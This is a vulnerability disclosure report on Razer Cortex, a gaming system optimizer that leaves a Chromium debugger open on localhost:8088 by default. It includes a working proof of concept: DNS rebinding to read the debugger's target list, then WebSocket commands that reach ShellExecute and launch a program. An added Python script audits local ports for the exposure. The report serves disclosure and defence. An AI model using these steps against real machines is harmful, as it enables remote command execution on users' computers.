Razer Cortex Debugger Remote Command Execution

Razer Cortex has a CEF debugger stub enabled by default allowing arbitrary remote command execution.


I was alerted on Twitter that the software distributed by Razer for their gaming equipment might be unsafe, so I downloaded the ones I could see online to take a look.

I have only looked at "Cortex", apparently some kind of system optimizer (frankly, the claims it makes seem dubious).

Cortex is a CEF (Chromium Embedded) application, and unbelievably they left the debugger running and enabled by default in production builds.

$ curl -si localhost:8088/json/list
HTTP/1.1 200 OK
Content-Type:application/json; charset=UTF-8

[ {
"description": "",
"devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:8088/devtools/page/(A6E5587C41694A59DB4142D98362B4CA)",
"id": "(A6E5587C41694A59DB4142D98362B4CA)",
"title": "Razer Game Deals - The best game deals on the web",
"type": "page",
"url": "https://deals.razer.com/?From=cortex&Userid=...",
"webSocketDebuggerUrl": "ws://localhost:8088/devtools/page/(A6E5587C41694A59DB4142D98362B4CA)"
} ]

That is obviously exploitable, but the mechanics are pretty tricky.

Razer ship a module called RazerCortex.Modules.Deals.JsInteractions in RazerCortex.Modules.Deals.dll that contains a method, JSOutBrowser.open(), whose argument is passed directly to ShellExecute(), so you can use it for command execution.

1. Read the list of pages using DNS rebinding from http://localhost:8088/json/list
2. Open a WebSocket to the webSocketDebuggerUrl listed.

Do something like:

x = new WebSocket("ws://localhost:8088/devtools/page/(EBC04DF125124EC6E07D8CEA8A0470E8)")

x.send(JSON.stringify({"id":1,"method":"Runtime.enable"})) // Enable javascript evaluation
x.send(JSON.stringify({"id":2,"method":"Runtime.evaluate","params":{"expression":"RazerCortexOutBrowser.open(JSON.stringify({url: \"c:\\\\windows\\\\system32\\\\calc.exe\"}))"}})) // Run arbitrary commands.
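To check a workstation for the exposure described above, the following added example (not part of the original report and not Razer's code) requests /json/list on loopback ports and repeats the request with a non-local Host header, since a stub that answers it does no Host validation and can be read through DNS rebinding. The function names, the extra port 9222 and the probe host name are assumptions; SAMPLE is constructed data.

```python
import http.client
import json

# Constructed sample, shaped like the /json/list response quoted in the report.
SAMPLE = json.dumps([{
    "id": "(0000)", "title": "sample", "type": "page",
    "url": "https://example.invalid/",
    "webSocketDebuggerUrl": "ws://localhost:8088/devtools/page/(0000)",
}])

def parse_targets(body):
    """Return (title, url, websocket URL) for each debuggable target listed."""
    try:
        entries = json.loads(body)
    except ValueError:
        return []
    if not isinstance(entries, list):
        return []
    return [(e.get("title", ""), e.get("url", ""), e["webSocketDebuggerUrl"])
            for e in entries
            if isinstance(e, dict) and e.get("webSocketDebuggerUrl")]

def fetch_list(port, host_header, timeout=2.0):
    """GET /json/list on 127.0.0.1:port with a chosen Host header ('' on failure)."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=timeout)
    try:
        conn.putrequest("GET", "/json/list", skip_host=True)
        conn.putheader("Host", host_header)
        conn.endheaders()
        resp = conn.getresponse()
        return resp.read().decode("utf-8", "replace") if resp.status == 200 else ""
    except (OSError, http.client.HTTPException):
        return ""
    finally:
        conn.close()

def audit_port(port):
    """Report debuggable targets on a loopback port and whether Host is validated."""
    targets = parse_targets(fetch_list(port, "localhost:%d" % port))
    # Assumed probe name: a stub that answers a non-local Host does no Host validation.
    foreign = parse_targets(fetch_list(port, "audit.example.invalid:%d" % port))
    return {"port": port, "targets": targets, "accepts_foreign_host": bool(foreign)}

if __name__ == "__main__":
    for result in map(audit_port, (8088, 9222)):  # 8088 from the report; 9222 assumed
        state = "EXPOSED" if result["targets"] else "no debugger found"
        print(result["port"], state, "foreign Host accepted:", result["accepts_foreign_host"])
        for title, url, ws in result["targets"]:
            print("   ", title, url, ws)
```

Any port reported as EXPOSED means a local process is serving a DevTools target list without authentication; the owning process can then be identified from the listening socket.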

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Found by: taviso
